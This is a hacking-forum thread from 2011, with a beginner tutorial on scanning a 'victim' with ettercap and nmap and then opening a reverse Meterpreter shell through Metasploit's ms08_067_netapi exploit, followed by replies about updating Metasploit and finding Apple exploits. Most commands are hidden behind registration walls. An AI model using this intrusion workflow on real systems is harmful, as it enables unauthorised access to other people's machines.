Basics of gaining access. (HOW TO GAIN ACCESS)

How to get a meterpreter shell.

Now in this tutorial I am using backtrack 4 r2 and going to be showing you how to get a meterpreter shell.


Here are the basics of gaining any type of shell.

How do we check for live hosts?

First we are going to be scanning to check what ports are open and OS (Operating System) fingerprinting. But before we do that your probably wondering how do we check if people are on the network and if they are what are their IP addresses. Well What I do and believe it is the easiest way by far is running ettercap. So lets run ettercap open up a console and type in.ettercap -G and ettercap will open up.

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

then ettercap opens up.





Now you can use hotkeys like I do make you look 1337 in front of people but for now we'll just use the mouse SNIFF > UNIFIED SNIFF and choose you interface mine is going to be vmnet1 Beacuse my Windows xp installation is in VmWare. Yours might be wlan0 if your on a wireless network or eth0 if connected LAN.





Now let's scan HOSTS > SCAN FOR HOSTS I recommend you scan a couple times then HOSTS > HOST LIST and you get your list.

How do we scan for ports and know what OS he's using?

Okay pick an IP address from the list and remember it. Now open up a new console to scan the victim with namp. Now nmap has a lot of options so it's really easy to get confused.but I don't want to talk too much about it just yet. So now back to our console type in nmap -O [your victims IP] . The -O options is Operating system detection. Then you should get something like this. Now just by looking at this we know its a Windows XP with our favorite port open 445 SMB.

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

Now what do we do with our favorite port and all this information?

Now lets open up METASPLOIT .

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

***TIP**

Now always run svnup before starting your attack to update metasploit. You also need to know you IP address if you don't know how type in ifconfig.


Now we now the port number we want to attack it was 445 smb let's use one of the best exploits out right now ms08_067_netapi will never fail you on a XP system trust me on this. Now that we know what exploit we are going to use lets set our payload now the payload is the type of shell you want to spawn could be a vnc cmd or a meterpreter. In this tutorial we are going for a reverse tcp meterpreter witch means he will connect to you.

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

Now lets see what options we need to set in order to launch the eaploit. Now type in show options and you will get something like what I have below. Do you see where it says required yes that means fill it out. First thing we see is the RHOST remote host witch is the victims ip address next thing is the LHOST local host our ip address.

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

Now lets run it. If everything goes well then you should get something like what i got.

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

What can I do now?

That will be for my next tutorial witch is all dedicated to post exploitation fun. Mean while I have a couple posts you can check out like how to

[To see links please register here]

or

[To see links please register here]

.




BTW this took me more than 5 hours I tried my best to make it n00b friendly hope this helps you guys.

Great!!! A question tho, how do you update metasploit? where can you view exploits? and what is best exploit for Apple TimeCapsule? :smile:

Great tut :smile: Thanks!!!

awesome thanks!!!

Thanks 1illusion
Now to update metasploit once in the ./msfconsole type in

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

Now to show exploits jsut run the command

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

You also might wanna try show payloads if your feeling confident

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

and you know show options

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

for apple exploits not really sure but try searching for a apple exploit like this

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

but let me look into it for you kk

(04-08-2011, 03:15 PM)1llusion Wrote:

[To see links please register here]

awesome thanks!!! :smile:

Hey 1llusion are you in linux if not hit me up on IM

(04-08-2011, 03:28 PM)enc0de Wrote:

[To see links please register here]

(04-08-2011, 03:26 PM)1llusion Wrote:

[To see links please register here]

(04-08-2011, 03:17 PM)enc0de Wrote:

[To see links please register here]

(04-08-2011, 03:15 PM)1llusion Wrote:

[To see links please register here]

awesome thanks!!! :smile:

Hey 1llusion are you in linux if not hit me up on IM

I'm in linux... sry... windows is not working :biggrin: gtg soon anyway, I'll make the vid when I come back :smile:

thanks for your help!!!

No problem its good your stuck in linux for now so you get the hang of it.

haha yes :biggrin: I used to use Ubuntu for like 2 weeks :smile: but that was long time ago

(04-08-2011, 03:17 PM)enc0de Wrote:

[To see links please register here]

(04-08-2011, 03:15 PM)1llusion Wrote:

[To see links please register here]

awesome thanks!!! :smile:

Hey 1llusion are you in linux if not hit me up on IM

I'm in linux... sry... windows is not working :biggrin: gtg soon anyway, I'll make the vid when I come back :smile:

thanks for your help!!!

(04-08-2011, 03:26 PM)1llusion Wrote:

[To see links please register here]

(04-08-2011, 03:17 PM)enc0de Wrote:

[To see links please register here]

(04-08-2011, 03:15 PM)1llusion Wrote:

[To see links please register here]

awesome thanks!!! :smile:

Hey 1llusion are you in linux if not hit me up on IM

I'm in linux... sry... windows is not working :biggrin: gtg soon anyway, I'll make the vid when I come back :smile:

thanks for your help!!!

No problem its good your stuck in linux for now so you get the hang of it.

That's good ubuntu is awesome hey don't forget backtrack 5 is coming soooooon can't wait to see their all new environment.

[To see links please register here]

Uploaded with

[To see links please register here]

What can i do with this error?